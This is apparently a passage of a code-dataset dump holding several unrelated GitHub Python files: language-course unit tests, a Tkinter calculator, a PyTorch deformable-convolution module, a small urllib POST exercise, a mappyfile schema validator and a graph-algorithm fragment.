Phrase(\n            in_target_language=[fakes.fake_value()],\n            in_source_language=[\"\"]\n        )\n        get_chips_challenge(fake_phrase, fakes.course1)\n        get_chips.assert_called_with(fake_phrase.in_target_language[0])\n\n\nclass GetChipsTest(TestCase):\n    def test_empty_string(self):\n        assert get_chips('') == []\n\n    @patch('liblili2json.challenge_types.clean_word')\n    def test_empty_string_doesnt_call_clean_word(self, clean_word):\n        get_chips('')\n        assert not clean_word.called\n\n    @patch('liblili2json.challenge_types.clean_word')\n    def test_calls_clean_word_with_correct_argument(self, clean_word):\n        get_chips('foo')\n        clean_word.assert_called_with('foo')\n\n    @patch('liblili2json.challenge_types.clean_word')\n    def test_returns_correct_value(self, clean_word):\n        clean_word.return_value = fakes.fake_value()\n        assert get_chips('foo') == [clean_word.return_value]\n\n    @patch('liblili2json.challenge_types.clean_word')\n    def test_returns_correct_number_of_words(self, clean_word):\n        assert len(get_chips('foo bar')) == 2\n\n\nclass CleanWordTest(TestCase):\n    def test_empty_string(self):\n        assert clean_word(\"\") == \"\"\n\n    def test_removes_parentheses(self):\n        assert clean_word(\"(foo\") == \"foo\"\n\n    def test_removes_comma(self):\n        assert clean_word(\"foo,\") == \"foo\"\n\n    def test_doesnt_remove_parts_of_word(self):\n        assert clean_word(\"ba-ar\") == \"ba-ar\"\n\n    def test_doesnt_remove_apostrophe(self):\n        assert clean_word(\"L'Hospitalet\") == \"L'Hospitalet\"\n\n    def test_removes_exclamation_mark(self):\n        assert clean_word(\"ba-ar!\") == \"ba-ar\"\n\n    def test_weird_english_possessive(self):\n        assert clean_word(\"cats'\") == \"cats'\"\n\n\nclass DefineWordsInSentenceTest(TestCase):\n    def test_empty_sentence(self):\n        assert define_words_in_sentence(fakes.course1, \"\", False) == []\n\n    @patch('liblili2json.dictionary.define_word')\n    def test_calls_define_word_the_correct_number_of_times(self, define_word):\n        define_words_in_sentence(fakes.course1, \"foo bar baz\", False)\n        assert define_word.call_count == 3\n\n    @patch('liblili2json.dictionary.define_word')\n    def test_calls_define_word_with_the_correct_data(self, define_word):\n        reverse = fakes.fake_value()\n        fake_word = str(fakes.fake_value())\n        define_words_in_sentence(\n            fakes.course1, fake_word, reverse)\n        define_word.assert_called_with(fakes.course1, fake_word, reverse)\n\n    @patch('liblili2json.dictionary.define_word')\n    def test_returns_correct_value(self, define_word):\n        define_word.return_value = fakes.fake_value()\n        assert define_words_in_sentence(\n            fakes.course1, \"foo\", True) == [define_word.return_value]\n\n    @ patch('liblili2json.dictionary.define_word')\n    def test_defines_every_word(self, define_word):\n        define_word.return_value = fakes.fake_value()\n        assert define_words_in_sentence(\n            fakes.course1, \"foo 
bar\", True) == [define_word.return_value, define_word.return_value]\n\n\nclass TestDefineWord(TestCase):\n def test_definition_not_found(self):\n word = fakes.fake_value()\n assert define_word(fakes.course1, word, reverse=False) == {\n \"word\": word\n }\n\n def test_includes_definition(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = Course(\n **{\n **(fakes.course1._asdict()),\n \"dictionary\": [\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=reverse\n ),\n ]\n },\n )\n assert define_word(my_course, word, reverse=reverse) == {\n \"word\": word,\n \"definition\": meaning\n }\n\n def test_doesnt_include_definition_with_different_word(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = Course(\n **{\n **(fakes.course1._asdict()),\n \"dictionary\": [\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=reverse\n ),\n ]\n },\n )\n assert define_word(my_course, \"asd\", reverse=reverse) == {\n \"word\": \"asd\",\n }\n\n def test_doesnt_include_definition_with_different_reverse(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = fakes.customize(fakes.course1, dictionary=[\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=False\n ),\n ])\n assert define_word(my_course, word, reverse=reverse) == {\n \"word\": word,\n }\n\n def test_skips_non_matching_definitions(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = fakes.customize(fakes.course1, dictionary=[\n DictionaryItem(\n word=None,\n definition=None,\n reverse=None\n ),\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=reverse\n ),\n ])\n assert define_word(my_course, word, reverse=reverse) == {\n \"word\": word,\n \"definition\": meaning\n }\n\n def test_skips_empty_definition(self):\n word = fakes.fake_value()\n my_course = fakes.customize(fakes.course1, dictionary=[\n DictionaryItem(\n word=word,\n definition=\"\",\n reverse=False\n ),\n ])\n assert define_word(my_course, word, reverse=False) == {\n \"word\": word,\n }\n\n\nclass TestGetDumbOpaqueId(TestCase):\n def test_word_only_first_meaning_matters_1(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.word1, in_source_language=[x])\n p2 = fakes.customize(fakes.word1, in_source_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_phrase_only_first_meaning_matters_1(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.phrase1, in_source_language=[x])\n p2 = fakes.customize(fakes.phrase1, in_source_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_word_only_first_meaning_matters_2(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.word1, in_target_language=[x])\n p2 = fakes.customize(fakes.word1, in_target_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_phrase_only_first_meaning_matters_2(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.phrase1, in_target_language=[x])\n p2 = fakes.customize(fakes.phrase1, in_target_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_the_first_meaning_does_matter(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = 
fakes.customize(fakes.phrase1, in_target_language=[x])\n        p2 = fakes.customize(fakes.phrase1, in_target_language=[y])\n        assert get_dumb_opaque_id(z, p1) != get_dumb_opaque_id(z, p2)\n\n\nclass TestGroupAndIdPhrase(TestCase):\n    def setUp(self):\n        self.groups = []\n        self.ids = []\n        challenges = get_phrase_challenges(fakes.phrase1, fakes.course1)\n        for challenge in challenges:\n            self.groups.append(challenge[\"group\"])\n            self.ids.append(challenge[\"id\"])\n        assert len(self.groups) > 1\n        assert len(self.ids) > 1\n\n    def test_group_is_the_same_in_each_challenge_type(self):\n        assert len(set(self.groups)) == 1\n\n    def test_id_is_different_in_each_challenge_type(self):\n        assert len(set(self.ids)) == len(self.ids)\n\n\nclass TestGroupAndIdWord(TestCase):\n    def setUp(self):\n        self.groups = []\n        self.ids = []\n        challenges = get_word_challenges(fakes.word1, fakes.course1)\n        for challenge in challenges:\n            self.groups.append(challenge[\"group\"])\n            self.ids.append(challenge[\"id\"])\n        assert len(self.groups) > 1\n        assert len(self.ids) > 1\n\n    def test_group_is_the_same_in_each_challenge_type(self):\n        assert len(set(self.groups)) == 1\n\n    def test_id_is_different_in_each_challenge_type(self):\n        assert len(set(self.ids)) == len(self.ids)\n","repo_name":"Magicianred/LibreLingo","sub_path":"workspaces/liblili2json/tests/test_liblili2json.py","file_name":"test_liblili2json.py","file_ext":"py","file_size_in_byte":23466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"26619834452","text":"from tkinter import *\r\n\r\n\r\nroot = Tk()\r\nmiFrame=Frame(root)\r\nmiFrame.config(bg=\"#9193CD\")\r\nmiFrame.pack()\r\n\r\noperacion=\"\"\r\nreset_pantalla=False\r\nresultado=0\r\n\r\n#--------------------\r\n\r\nnumeroPantalla=StringVar()\r\n\r\npantalla=Entry(miFrame,textvariable=numeroPantalla)\r\npantalla.grid(row=1, column=1, padx=10,pady=10,columnspan=4)\r\npantalla.config(fg=\"black\", justify=\"right\")\r\n\r\n#------------- number button pressed\r\n\r\ndef numeropulsado(num):\r\n    global operacion\r\n    global reset_pantalla\r\n\r\n    if reset_pantalla!=False:\r\n        numeroPantalla.set(num)\r\n        reset_pantalla=False\r\n    else:\r\n        numeroPantalla.set(numeroPantalla.get() + num)\r\n\r\n\r\n#-------- ADDITION --------------\r\ndef suma(num):\r\n    global operacion\r\n    global resultado\r\n    global reset_pantalla\r\n\r\n    resultado +=int(num)\r\n    operacion=\"suma\"\r\n    reset_pantalla=True\r\n    numeroPantalla.set(resultado)\r\n\r\n\r\n#------- SUBTRACTION --------------\r\nnum1=0\r\ncontador_resta=0\r\ndef resta(num):\r\n    global operacion\r\n    global resultado\r\n    global num1\r\n    global contador_resta\r\n    global reset_pantalla\r\n    \r\n    if contador_resta==0:\r\n        num1=int(num)\r\n        resultado=num1\r\n    else:\r\n        if contador_resta==1:\r\n            resultado=num1-int(num)\r\n        else:\r\n            resultado=int(resultado)-int(num)\r\n        numeroPantalla.set(resultado)\r\n        resultado=numeroPantalla.get()\r\n    contador_resta=contador_resta+1\r\n    operacion=\"resta\"\r\n    reset_pantalla=True\r\n    \r\n\r\n#---------------- MULTIPLICATION -------------------\r\n\r\ncontador_multi=0\r\n\r\ndef multiplica(num):\r\n\r\n\tglobal operacion\r\n\tglobal resultado\r\n\tglobal num1\r\n\tglobal contador_multi\r\n\tglobal reset_pantalla\r\n\t\r\n\tif contador_multi==0:\r\n\t\tnum1=int(num)\r\n\t\tresultado=num1\r\n\r\n\telse:\r\n\r\n\t\tif 
contador_multi==1:\r\n\t\t\tresultado=num1*int(num)\r\n\r\n\t\telse:\r\n\t\t\tresultado=int(resultado)*int(num)\t\r\n\t\tnumeroPantalla.set(resultado)\t\t\r\n\t\tresultado=numeroPantalla.get()\r\n\r\n\tcontador_multi=contador_multi+1\r\n\toperacion=\"multiplicacion\"\r\n\treset_pantalla=True\r\n\r\n\r\n#-----------------DIVISION ---------------\r\n\r\ncontador_divi=0\r\n\r\ndef divide(num):\r\n\r\n\tglobal operacion\r\n\tglobal resultado\r\n\tglobal num1\r\n\tglobal contador_divi\r\n\tglobal reset_pantalla\r\n\tif contador_divi==0:\r\n\r\n\t\tnum1=float(num)\t\r\n\t\tresultado=num1\r\n\r\n\telse:\r\n\r\n\t\tif contador_divi==1:\r\n\t\t\tresultado=num1/float(num)\r\n\t\telse:\r\n\t\t\tresultado=float(resultado)/float(num)\r\n\r\n\t\tnumeroPantalla.set(resultado)\t\t\r\n\t\tresultado=numeroPantalla.get()\r\n\r\n\r\n\tcontador_divi=contador_divi+1\r\n\toperacion=\"division\"\r\n\treset_pantalla=True\r\n\r\n\r\n\r\n#-------- THE RESULT ---------\r\n\r\ndef el_resultado():\r\n\r\n\tglobal resultado\r\n\tglobal operacion\r\n\tglobal contador_resta\r\n\tglobal contador_multi\r\n\tglobal contador_divi\r\n\t\r\n\r\n\tif operacion==\"suma\":\r\n\t\tnumeroPantalla.set(resultado+int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\r\n\telif operacion==\"resta\":\r\n\t\tnumeroPantalla.set(int(resultado)-int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\t\tcontador_resta=0\r\n\r\n\telif operacion==\"multiplicacion\":\r\n\t\tnumeroPantalla.set(int(resultado)*int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\t\tcontador_multi=0\r\n\r\n\telif operacion==\"division\":\r\n\t\tnumeroPantalla.set(int(resultado)/int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\t\tcontador_divi=0\r\n\r\n\r\n\r\n\r\n#---------------------- FIRST ROW OF BUTTONS\r\n\r\nboton7=Button(miFrame, text=\"7\",width=3,command=lambda:numeropulsado(\"7\"))\r\nboton7.grid(row=2, column=1)\r\nboton8=Button(miFrame, text=\"8\",width=3,command=lambda:numeropulsado(\"8\"))\r\nboton8.grid(row=2, column=2)\r\nboton9=Button(miFrame, text=\"9\",width=3,command=lambda:numeropulsado(\"9\"))\r\nboton9.grid(row=2, column=3)\r\nbotonMulti=Button(miFrame, text=\"*\",width=3,command=lambda:multiplica(numeroPantalla.get()))\r\nbotonMulti.grid(row=2, column=4)\r\n\r\n#--------------------- SECOND ROW OF BUTTONS\r\n\r\nboton4=Button(miFrame, text=\"4\",width=3,command=lambda:numeropulsado(\"4\"))\r\nboton4.grid(row=3, column=1)\r\nboton5=Button(miFrame, text=\"5\",width=3,command=lambda:numeropulsado(\"5\"))\r\nboton5.grid(row=3, column=2)\r\nboton6=Button(miFrame, text=\"6\",width=3,command=lambda:numeropulsado(\"6\"))\r\nboton6.grid(row=3, column=3)\r\nbotonDiv=Button(miFrame, text=\"/\",width=3,command=lambda:divide(numeroPantalla.get()))\r\nbotonDiv.grid(row=3, column=4)\r\n\r\n\r\n#-------------------- THIRD ROW OF BUTTONS\r\n\r\nboton3=Button(miFrame, text=\"1\",width=3,command=lambda:numeropulsado(\"1\"))\r\nboton3.grid(row=4, column=1)\r\nboton2=Button(miFrame, text=\"2\",width=3,command=lambda:numeropulsado(\"2\"))\r\nboton2.grid(row=4, column=2)\r\nboton1=Button(miFrame, text=\"3\",width=3,command=lambda:numeropulsado(\"3\"))\r\nboton1.grid(row=4, column=3)\r\nbotonResta=Button(miFrame, text=\"-\",width=3,command=lambda:resta(numeroPantalla.get()))\r\nbotonResta.grid(row=4, column=4)\r\n\r\n#-------------------- FINAL ROW !!\r\n\r\nbotonComa=Button(miFrame, text=\",\",width=3,command=lambda:numeropulsado(\",\"))\r\nbotonComa.grid(row=5, column=1)\r\nboton0=Button(miFrame, 
text=\"0\",width=3,command=lambda:numeropulsado(\"0\"))\r\nboton0.grid(row=5, column=2)\r\nbotonIgual=Button(miFrame, text=\"=\",width=3,command=lambda:el_resultado())\r\nbotonIgual.grid(row=5, column=3)\r\nbotonSumar=Button(miFrame, text=\"+\",width=3,command=lambda:suma(numeroPantalla.get()))\r\nbotonSumar.grid(row=5, column=4)\r\n\r\n#---------------------------------------------\r\n\r\nroot.mainloop()","repo_name":"LucasNLopez/CALCULADORA","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31799413236","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Function\nfrom torch.autograd.function import once_differentiable\nfrom torch.nn.modules.utils import _pair\n\nfrom . import deform_conv_cuda\n\nclass DeformConvFunction(Function): \n @staticmethod\n def forward(ctx,\n input,\n offset,\n weight,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n deformable_groups=1,\n im2col_step=64):\n if input is not None and input.dim() != 4:\n raise ValueError(\n \"Expected 4D tensor as input, got {}D tensor instead.\".format(\n input.dim()))\n ctx.stride = _pair(stride)\n ctx.padding = _pair(padding)\n ctx.dilation = _pair(dilation)\n ctx.groups = groups\n ctx.deformable_groups = deformable_groups\n ctx.im2col_step = im2col_step\n\n # support f16, from mmdetection mmcv \n # When pytorch version >= 1.6.0, amp is adopted for fp16 mode;\n # amp won't cast the type of model (float32), but \"offset\" is cast\n # to float16 by nn.Conv2d automatically, leading to the type\n # mismatch with input (when it is float32) or weight.\n # The flag for whether to use fp16 or amp is the type of \"offset\",\n # we cast weight and input to temporarily support fp16 and amp\n # whatever the pytorch version is.\n offset = offset.type_as(input)\n weight = weight.type_as(input)\n # input = input.type_as(offset)\n # weight = weight.type_as(input)\n\n ctx.save_for_backward(input, offset, weight)\n\n output = input.new_empty(\n DeformConvFunction._output_size(input, weight, ctx.padding,\n ctx.dilation, ctx.stride))\n\n ctx.bufs_ = [input.new_empty(0), input.new_empty(0)] # columns, ones\n\n if not input.is_cuda:\n raise NotImplementedError\n else:\n cur_im2col_step = min(ctx.im2col_step, input.shape[0])\n assert (input.shape[0] %\n cur_im2col_step) == 0, 'im2col step must divide batchsize'\n \n deform_conv_cuda.deform_conv_forward_cuda(\n input, weight, offset, output, ctx.bufs_[0], ctx.bufs_[1],\n weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0],\n ctx.padding[1], ctx.padding[0], ctx.dilation[1],\n ctx.dilation[0], ctx.groups, ctx.deformable_groups,\n cur_im2col_step)\n return output\n\n @staticmethod\n @once_differentiable\n def backward(ctx, grad_output):\n input, offset, weight = ctx.saved_tensors\n\n grad_input = grad_offset = grad_weight = None\n\n if not grad_output.is_cuda:\n raise NotImplementedError\n else:\n cur_im2col_step = min(ctx.im2col_step, input.shape[0])\n assert (input.shape[0] %\n cur_im2col_step) == 0, 'im2col step must divide batchsize'\n\n if ctx.needs_input_grad[0] or ctx.needs_input_grad[1]:\n grad_input = torch.zeros_like(input)\n grad_offset = torch.zeros_like(offset)\n deform_conv_cuda.deform_conv_backward_input_cuda(\n input, offset, grad_output, grad_input,\n grad_offset, weight, ctx.bufs_[0], weight.size(3),\n weight.size(2), ctx.stride[1], ctx.stride[0],\n 
ctx.padding[1], ctx.padding[0], ctx.dilation[1],\n ctx.dilation[0], ctx.groups, ctx.deformable_groups,\n cur_im2col_step)\n\n if ctx.needs_input_grad[2]:\n grad_weight = torch.zeros_like(weight)\n deform_conv_cuda.deform_conv_backward_parameters_cuda(\n input, offset, grad_output,\n grad_weight, ctx.bufs_[0], ctx.bufs_[1], weight.size(3),\n weight.size(2), ctx.stride[1], ctx.stride[0],\n ctx.padding[1], ctx.padding[0], ctx.dilation[1],\n ctx.dilation[0], ctx.groups, ctx.deformable_groups, 1,\n cur_im2col_step)\n\n return (grad_input, grad_offset, grad_weight, None, None, None, None,\n None)\n\n @staticmethod\n def _output_size(input, weight, padding, dilation, stride):\n channels = weight.size(0)\n output_size = (input.size(0), channels)\n for d in range(input.dim() - 2):\n in_size = input.size(d + 2)\n pad = padding[d]\n kernel = dilation[d] * (weight.size(d + 2) - 1) + 1\n stride_ = stride[d]\n output_size += ((in_size + (2 * pad) - kernel) // stride_ + 1, )\n \n \n if not all(map(lambda s: s > 0, output_size)):\n raise ValueError(\n \"convolution input is too small (output would be {})\".format(\n 'x'.join(map(str, output_size))))\n \n \n return output_size\n\n\ndeform_conv = DeformConvFunction.apply\n\n\ndef DeformConvFunction_output_size(input, weight, padding,\n dilation, stride):\n channels = weight.size(0)\n output_size = (input.size(0), channels)\n for d in range(input.dim() - 2):\n in_size = input.size(d + 2)\n pad = padding[d]\n kernel = dilation[d] * (weight.size(d + 2) - 1) + 1\n stride_ = stride[d]\n output_size += ((in_size + (2 * pad) - kernel) // stride_ + 1, )\n \n if not all(map(lambda s: s > 0, output_size)):\n raise ValueError(\n \"convolution input is too small (output would be {})\".format(\n 'x'.join(map(str, output_size))))\n \n return output_size\n\n# @torch.jit.script\ndef DeformConvFunction_forward(input,\n offset,\n weight,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n deformable_groups=1,\n im2col_step=64):\n \n if input is not None and input.dim() != 4:\n raise ValueError(\n \"Expected 4D tensor as input, got {}D tensor instead.\".format(\n input.dim()))\n \n \n # stride = _pair(stride)\n # padding = _pair(padding)\n # dilation = _pair(dilation)\n\n # support f16, from mmdetection mmcv \n # When pytorch version >= 1.6.0, amp is adopted for fp16 mode;\n # amp won't cast the type of model (float32), but \"offset\" is cast\n # to float16 by nn.Conv2d automatically, leading to the type\n # mismatch with input (when it is float32) or weight.\n # The flag for whether to use fp16 or amp is the type of \"offset\",\n # we cast weight and input to temporarily support fp16 and amp\n # whatever the pytorch version is.\n offset = offset.type_as(input)\n weight = weight.type_as(input)\n # input = input.type_as(offset)\n # weight = weight.type_as(input)\n\n output = input.new_empty(\n DeformConvFunction_output_size(input, weight, padding,\n dilation, stride))\n\n\n bufs_ = [input.new_empty(1), input.new_empty(1)] # columns, ones\n\n # if not input.is_cuda:\n # raise NotImplementedError\n # else:\n # cur_im2col_step = min(im2col_step, input.shape[0])\n # assert (input.shape[0] %\n # cur_im2col_step) == 0, 'im2col step must divide batchsize'\n \n # deform_conv_cuda.deform_conv_forward_cuda(\n # input, weight, offset, output, bufs_[0], bufs_[1],\n # weight.size(3), weight.size(2), stride[1], stride[0],\n # padding[1], padding[0], dilation[1],\n # dilation[0], groups, deformable_groups,\n # cur_im2col_step)\n \n \n \n cur_im2col_step = min(im2col_step, input.shape[0])\n 
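# im2col_step caps how many samples share a single im2col buffer; it was clamped\n    # to the batch size above and must divide it evenly (enforced by the assert below).\n    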
assert (input.shape[0] %\n            cur_im2col_step) == 0, 'im2col step must divide batchsize'\n\n    deform_conv_cuda.deform_conv_forward_cuda(\n        input, weight, offset, output, bufs_[0], bufs_[1],\n        weight.size(3), weight.size(2), stride[1], stride[0],\n        padding[1], padding[0], dilation[1],\n        dilation[0], groups, deformable_groups,\n        cur_im2col_step)\n\n    # print(\"done\")\n    return output\n\n\n\nclass DeformConv(nn.Module):\n\n    def __init__(self,\n                 in_channels,\n                 out_channels,\n                 kernel_size,\n                 stride=1,\n                 padding=0,\n                 dilation=1,\n                 groups=1,\n                 deformable_groups=1,\n                 bias=False):\n        super(DeformConv, self).__init__()\n\n        assert not bias\n        assert in_channels % groups == 0, \\\n            'in_channels {} is not divisible by groups {}'.format(\n                in_channels, groups)\n        assert out_channels % groups == 0, \\\n            'out_channels {} is not divisible by groups {}'.format(\n                out_channels, groups)\n\n        self.in_channels = in_channels\n        self.out_channels = out_channels\n        self.kernel_size = _pair(kernel_size)\n        self.stride = _pair(stride)\n        self.padding = _pair(padding)\n        self.dilation = _pair(dilation)\n        self.groups = groups\n        self.deformable_groups = deformable_groups\n\n        self.weight = nn.Parameter(\n            torch.Tensor(out_channels, in_channels // self.groups,\n                         *self.kernel_size))\n\n        self.reset_parameters()\n\n    def reset_parameters(self):\n        n = self.in_channels\n        for k in self.kernel_size:\n            n *= k\n        stdv = 1. / math.sqrt(n)\n        self.weight.data.uniform_(-stdv, stdv)\n\n    def forward(self, x, offset):\n        # return deform_conv(x, offset, self.weight, self.stride, self.padding,\n        #                    self.dilation, self.groups, self.deformable_groups)\n        # To fix an assert error in deform_conv_cuda.cpp:128\n        # input image is smaller than kernel\n        input_pad = (\n            x.size(2) < self.kernel_size[0] or x.size(3) < self.kernel_size[1])\n        if input_pad:\n            pad_h = max(self.kernel_size[0] - x.size(2), 0)\n            pad_w = max(self.kernel_size[1] - x.size(3), 0)\n            x = F.pad(x, (0, pad_w, 0, pad_h), 'constant', 0).contiguous()\n            offset = F.pad(offset, (0, pad_w, 0, pad_h), 'constant',\n                           0).contiguous()\n        \n        # out = deform_conv(x, offset, self.weight, self.stride, self.padding,\n        #                     self.dilation, self.groups, self.deformable_groups)\n\n        \n        out = DeformConvFunction_forward(x, offset, self.weight, self.stride, self.padding,\n                            self.dilation, self.groups, self.deformable_groups)\n        \n        # out = x.new_empty(x.shape)\n\n        if input_pad:\n            out = out[:, :, :out.size(2) - pad_h, :out.size(3) -\n                      pad_w].contiguous()\n        \n        return out\n\n","repo_name":"chongkuiqi/FTRP_app","sub_path":"example/FTRP_software/models/dcn/deform_conv.py","file_name":"deform_conv.py","file_ext":"py","file_size_in_byte":11021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17512056669","text":"#!/usr/bin/python3\n# POST Request\nimport urllib.request as request\nimport urllib.parse as parse\nfrom sys import argv\n\n\nif __name__ == '__main__':\n    url = argv[1]\n    data = {\"email\": argv[2]}\n\n    post = parse.urlencode(data).encode(\"utf-8\")\n    req = request.Request(url, post)\n\n    with request.urlopen(req) as response:\n        print(response.read().decode(\"utf-8\"))\n","repo_name":"dantsub/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42567383812","text":"import json\nimport os\nimport sys\nfrom collections import OrderedDict\nimport 
logging\nimport jsonschema\nimport jsonref\nimport mappyfile as utils\n\nlog = logging.getLogger(\"mappyfile\")\n\nPY2 = sys.version_info[0] < 3\nif PY2:\n str = unicode # NOQA\n\n\nclass Validator(object):\n\n def __init__(self):\n self.schemas = {}\n self.expanded_schemas = {}\n\n def get_schema_path(self, schemas_folder):\n \"\"\"\n Return a file protocol URI e.g. file:///D:/mappyfile/mappyfile/schemas/ on Windows\n and file:////home/user/mappyfile/mappyfile/schemas/ on Linux\n \"\"\"\n\n # replace any Windows path back slashes with forward slashes\n schemas_folder = schemas_folder.replace(\"\\\\\", \"/\")\n\n # HACK Python 2.7 on Linux seems to remove the root slash\n # so add this back in\n if schemas_folder.startswith(\"/\"):\n schemas_folder = \"/\" + schemas_folder\n\n host = \"\"\n root_schema_path = \"file://{}/{}\".format(host, schemas_folder) + \"/\"\n\n return root_schema_path\n\n def get_schemas_folder(self):\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), \"schemas\")\n\n def get_schema_file(self, schema_name):\n\n schema_name += \".json\"\n schemas_folder = self.get_schemas_folder()\n schema_file = os.path.join(schemas_folder, schema_name)\n\n if not os.path.isfile(schema_file):\n raise IOError(\"The file %s does not exist\" % schema_file)\n\n return schema_file\n\n def get_schema_validator(self, schema_name):\n \"\"\"\n Had to remove the id property from map.json or it uses URLs for validation\n See various issues at https://github.com/Julian/jsonschema/pull/306\n \"\"\"\n\n if schema_name not in self.schemas:\n schema_file = self.get_schema_file(schema_name)\n with open(schema_file) as f:\n try:\n jsn_schema = json.load(f)\n except ValueError as ex:\n log.error(\"Could not load %s\", schema_file)\n raise ex\n\n schemas_folder = self.get_schemas_folder()\n root_schema_path = self.get_schema_path(schemas_folder)\n resolver = jsonschema.RefResolver(root_schema_path, None)\n # cache the schema for future use\n self.schemas[schema_name] = (jsn_schema, resolver)\n else:\n jsn_schema, resolver = self.schemas[schema_name]\n\n validator = jsonschema.Draft4Validator(schema=jsn_schema, resolver=resolver)\n # validator.check_schema(jsn_schema) # check schema is valid\n\n return validator\n\n def convert_lowercase(self, x):\n\n if isinstance(x, list):\n return [self.convert_lowercase(v) for v in x]\n elif isinstance(x, dict):\n return OrderedDict((k.lower(), self.convert_lowercase(v)) for k, v in x.items())\n else:\n if isinstance(x, (str, bytes)):\n x = x.lower()\n\n return x\n\n def create_message(self, rootdict, path, error, add_comments):\n \"\"\"\n Add a validation comment to the dictionary\n path is the path to the error object, it can be empty if the error is in the root object\n http://python-jsonschema.readthedocs.io/en/latest/errors/#jsonschema.exceptions.ValidationError.absolute_path\n It can also reference an object in a list e.g. 
[u'layers', 0]\n        \"\"\"\n\n        if not path:\n            # error applies to the root type\n            d = rootdict\n            key = d[\"__type__\"]\n        elif isinstance(path[-1], int):\n            # the error is on an object in a list\n            d = utils.findkey(rootdict, *path)\n            key = d[\"__type__\"]\n        else:\n            key = path[-1]\n            d = utils.findkey(rootdict, *path[:-1])\n\n        error_message = \"ERROR: Invalid value for {}\".format(key.upper())\n\n        # add a comment to the dict structure\n\n        if add_comments:\n            if \"__comments__\" not in d:\n                d[\"__comments__\"] = OrderedDict()\n\n            d[\"__comments__\"][key] = \"# {}\".format(error_message)\n\n        error_message = {\"error\": error.message,\n                         \"message\": error_message}\n\n        # add in details of the error line, when Mapfile was parsed to\n        # include position details\n\n        if \"__position__\" in d:\n            pd = d[\"__position__\"][key]\n            error_message[\"line\"] = pd.get(\"line\")\n            error_message[\"column\"] = pd.get(\"column\")\n\n        return error_message\n\n    def get_error_messages(self, d, errors, add_comments):\n\n        error_messages = []\n\n        for error in errors:\n            pth = error.absolute_path\n            pth = list(pth)  # convert deque to list\n            em = self.create_message(d, pth, error, add_comments)\n            error_messages.append(em)\n\n        return error_messages\n\n    def _validate(self, d, validator, add_comments, schema_name):\n        lowercase_dict = self.convert_lowercase(d)\n        jsn = json.loads(json.dumps(lowercase_dict), object_pairs_hook=OrderedDict)\n\n        errors = list(validator.iter_errors(jsn))\n        error_messages = self.get_error_messages(d, errors, add_comments)\n\n        return error_messages\n\n    def validate(self, value, add_comments=False, schema_name=\"map\"):\n        \"\"\"\n        add_comments - also add the error messages as comments to the dictionary\n        \"\"\"\n        validator = self.get_schema_validator(schema_name)\n\n        error_messages = []\n\n        if isinstance(value, list):\n            for d in value:\n                error_messages += self._validate(d, validator, add_comments, schema_name)\n        else:\n            error_messages = self._validate(value, validator, add_comments, schema_name)\n\n        return error_messages\n\n    def get_expanded_schema(self, schema_name):\n        \"\"\"\n        Return a schema file with all $ref properties expanded\n        \"\"\"\n        if schema_name not in self.expanded_schemas:\n            fn = self.get_schema_file(schema_name)\n            schemas_folder = self.get_schemas_folder()\n            base_uri = self.get_schema_path(schemas_folder)\n\n            with open(fn) as f:\n                jsn_schema = jsonref.load(f, base_uri=base_uri)\n\n            # cache the schema for future use\n            self.expanded_schemas[schema_name] = jsn_schema\n        else:\n            jsn_schema = self.expanded_schemas[schema_name]\n\n        return jsn_schema\n","repo_name":"guardeivid/mappyfile","sub_path":"mappyfile/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"12012607333","text":"import sys\nfrom collections import defaultdict, deque\n\nsys.setrecursionlimit(10 ** 6)\n\ndef dfs(v):\n    global counter\n    counter += 1\n    dfs_num[v] = dfs_low[v] = counter\n    dfs_stack.append(v)\n    visited[v] = True\n\n    for u in graph[v]:\n        if dfs_num[u] == 0:\n            dfs(u)\n        if visited[u]:\n            dfs_low[v] = min(dfs_low[v], dfs_low[u])\n\n    if dfs_num[v] == dfs_low[v]:\n        component = []\n        while 